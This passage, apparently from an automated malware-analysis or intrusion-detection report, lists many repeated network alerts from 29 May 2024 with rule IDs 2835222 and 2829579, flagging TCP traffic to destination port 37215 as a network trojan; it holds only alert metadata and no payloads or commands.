                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798656
                SID:2835222
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328188
                SID:2835222
                Source Port:41246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586237
                SID:2835222
                Source Port:47228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650638
                SID:2835222
                Source Port:49860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656156
                SID:2829579
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789315
                SID:2829579
                Source Port:36936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215467
                SID:2829579
                Source Port:60780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685542
                SID:2829579
                Source Port:58920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721899
                SID:2829579
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782999
                SID:2829579
                Source Port:57254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149980
                SID:2829579
                Source Port:58538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584983
                SID:2829579
                Source Port:52684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716467
                SID:2829579
                Source Port:33504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239626
                SID:2835222
                Source Port:35300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169250
                SID:2829579
                Source Port:43600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843516
                SID:2829579
                Source Port:58448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363434
                SID:2829579
                Source Port:58760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811667
                SID:2829579
                Source Port:60952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526053
                SID:2835222
                Source Port:43336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563198
                SID:2829579
                Source Port:57056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419966
                SID:2835222
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989665
                SID:2829579
                Source Port:60080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986002
                SID:2835222
                Source Port:34126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289167
                SID:2829579
                Source Port:57560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437141
                SID:2829579
                Source Port:60124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660491
                SID:2835222
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416552
                SID:2829579
                Source Port:49542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823589
                SID:2835222
                Source Port:36116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263782
                SID:2829579
                Source Port:41654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901464
                SID:2829579
                Source Port:47366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782207
                SID:2835222
                Source Port:44944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625015
                SID:2835222
                Source Port:60372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858223
                SID:2829579
                Source Port:46006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226550
                SID:2835222
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222940
                SID:2835222
                Source Port:52754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.588366
                SID:2829579
                Source Port:46500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532261
                SID:2835222
                Source Port:34876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072658
                SID:2835222
                Source Port:34838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432658
                SID:2835222
                Source Port:45346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914612
                SID:2829579
                Source Port:48986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767713
                SID:2829579
                Source Port:59916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910053
                SID:2829579
                Source Port:45316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237616
                SID:2829579
                Source Port:60394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770806
                SID:2835222
                Source Port:46572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224004
                SID:2829579
                Source Port:33842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654339
                SID:2829579
                Source Port:50304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689047
                SID:2835222
                Source Port:38170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716379
                SID:2835222
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885751
                SID:2835222
                Source Port:34852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134751
                SID:2835222
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854211
                SID:2829579
                Source Port:54216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763328
                SID:2835222
                Source Port:44926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535182
                SID:2835222
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463208
                SID:2829579
                Source Port:56214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951647
                SID:2835222
                Source Port:39932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984951
                SID:2829579
                Source Port:39856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669321
                SID:2835222
                Source Port:41304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463996
                SID:2835222
                Source Port:49046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073901
                SID:2829579
                Source Port:53012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928299
                SID:2835222
                Source Port:36312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944495
                SID:2829579
                Source Port:57248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618694
                SID:2829579
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945524
                SID:2835222
                Source Port:34364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610048
                SID:2835222
                Source Port:41496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868044
                SID:2829579
                Source Port:54196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141868
                SID:2835222
                Source Port:58872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668746
                SID:2835222
                Source Port:44192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943054
                SID:2835222
                Source Port:48622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804974
                SID:2835222
                Source Port:47170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947752
                SID:2829579
                Source Port:49086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555573
                SID:2835222
                Source Port:37818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461384
                SID:2829579
                Source Port:60670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813246
                SID:2835222
                Source Port:48080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562205
                SID:2829579
                Source Port:57274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967628
                SID:2835222
                Source Port:53410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165007
                SID:2835222
                Source Port:34342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363007
                SID:2835222
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807352
                SID:2829579
                Source Port:39814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069640
                SID:2829579
                Source Port:49486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843346
                SID:2835222
                Source Port:45934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943574
                SID:2829579
                Source Port:34544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164921
                SID:2829579
                Source Port:57628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963029
                SID:2829579
                Source Port:44486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983184
                SID:2829579
                Source Port:47208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915980
                SID:2829579
                Source Port:37446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531672
                SID:2829579
                Source Port:56808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088365
                SID:2835222
                Source Port:32998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900645
                SID:2829579
                Source Port:50302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112670
                SID:2829579
                Source Port:34470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324435
                SID:2829579
                Source Port:60898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982663
                SID:2829579
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843401
                SID:2835222
                Source Port:47854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869165
                SID:2829579
                Source Port:58930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824556
                SID:2829579
                Source Port:49402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.170969
                SID:2835222
                Source Port:53442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174965
                SID:2829579
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610112
                SID:2835222
                Source Port:58112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136279
                SID:2829579
                Source Port:39030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841556
                SID:2835222
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277145
                SID:2829579
                Source Port:33400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844665
                SID:2835222
                Source Port:33826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268462
                SID:2835222
                Source Port:34784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120571
                SID:2835222
                Source Port:38834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597960
                SID:2835222
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163956
                SID:2835222
                Source Port:59276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672796
                SID:2829579
                Source Port:35388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901153
                SID:2829579
                Source Port:47810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684904
                SID:2835222
                Source Port:58214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571288
                SID:2829579
                Source Port:57762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335279
                SID:2835222
                Source Port:53922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422209
                SID:2829579
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072559
                SID:2835222
                Source Port:57088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361862
                SID:2829579
                Source Port:37058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.606742
                SID:2829579
                Source Port:57710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.546813
                SID:2835222
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915173
                SID:2829579
                Source Port:46292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617392
                SID:2829579
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265893
                SID:2829579
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629663
                SID:2835222
                Source Port:59634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969753
                SID:2835222
                Source Port:41512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873351
                SID:2829579
                Source Port:41014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418875
                SID:2829579
                Source Port:58572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900170
                SID:2829579
                Source Port:49560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702010
                SID:2829579
                Source Port:39914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610847
                SID:2835222
                Source Port:47270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966876
                SID:2835222
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919507
                SID:2829579
                Source Port:37530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560199
                SID:2835222
                Source Port:50618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325630
                SID:2835222
                Source Port:33598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929112
                SID:2829579
                Source Port:33502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854046
                SID:2835222
                Source Port:44616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869476
                SID:2829579
                Source Port:45374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586345
                SID:2835222
                Source Port:53226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944945
                SID:2829579
                Source Port:51740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111778
                SID:2829579
                Source Port:44262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508223
                SID:2829579
                Source Port:52632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896659
                SID:2829579
                Source Port:45026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449668
                SID:2835222
                Source Port:44718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663190
                SID:2829579
                Source Port:37532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509683
                SID:2829579
                Source Port:58848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897908
                SID:2835222
                Source Port:41282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972292
                SID:2835222
                Source Port:41564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766979
                SID:2835222
                Source Port:39164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243083
                SID:2829579
                Source Port:58418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846302
                SID:2829579
                Source Port:55522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561889
                SID:2835222
                Source Port:50076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670588
                SID:2835222
                Source Port:42790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288322
                SID:2829579
                Source Port:35852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984643
                SID:2835222
                Source Port:37998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650622
                SID:2835222
                Source Port:39040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042078
                SID:2835222
                Source Port:36572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212922
                SID:2835222
                Source Port:54384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.615144
                SID:2829579
                Source Port:55174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.139959
                SID:2835222
                Source Port:54458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535668
                SID:2835222
                Source Port:42532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871524
                SID:2829579
                Source Port:54146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560999
                SID:2835222
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626599
                SID:2835222
                Source Port:52976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990592
                SID:2835222
                Source Port:51774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796056
                SID:2829579
                Source Port:53714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276917
                SID:2835222
                Source Port:53228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.439622
                SID:2829579
                Source Port:38134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276513
                SID:2835222
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982534
                SID:2829579
                Source Port:40654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878136
                SID:2835222
                Source Port:44354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901417
                SID:2829579
                Source Port:57552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438195
                SID:2835222
                Source Port:60682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766967
                SID:2835222
                Source Port:48750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165484
                SID:2835222
                Source Port:51620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275409
                SID:2835222
                Source Port:43620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511161
                SID:2829579
                Source Port:37924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561863
                SID:2835222
                Source Port:47962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664004
                SID:2829579
                Source Port:34350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184850
                SID:2829579
                Source Port:47104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631622
                SID:2835222
                Source Port:41040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184640
                SID:2829579
                Source Port:51846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547589
                SID:2835222
                Source Port:51788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560896
                SID:2835222
                Source Port:59400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684576
                SID:2835222
                Source Port:58242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898143
                SID:2829579
                Source Port:49890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232350
                SID:2835222
                Source Port:43374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136910
                SID:2829579
                Source Port:35998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265257
                SID:2829579
                Source Port:34818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739638
                SID:2829579
                Source Port:44814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660847
                SID:2829579
                Source Port:44098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557736
                SID:2829579
                Source Port:46554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969724
                SID:2829579
                Source Port:58496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518899
                SID:2829579
                Source Port:33468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896693
                SID:2829579
                Source Port:49578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943324
                SID:2829579
                Source Port:45128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065281
                SID:2835222
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887625
                SID:2835222
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717974
                SID:2835222
                Source Port:42130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840944
                SID:2835222
                Source Port:53456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359750
                SID:2829579
                Source Port:36494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166362
                SID:2829579
                Source Port:40292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910910
                SID:2829579
                Source Port:38524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
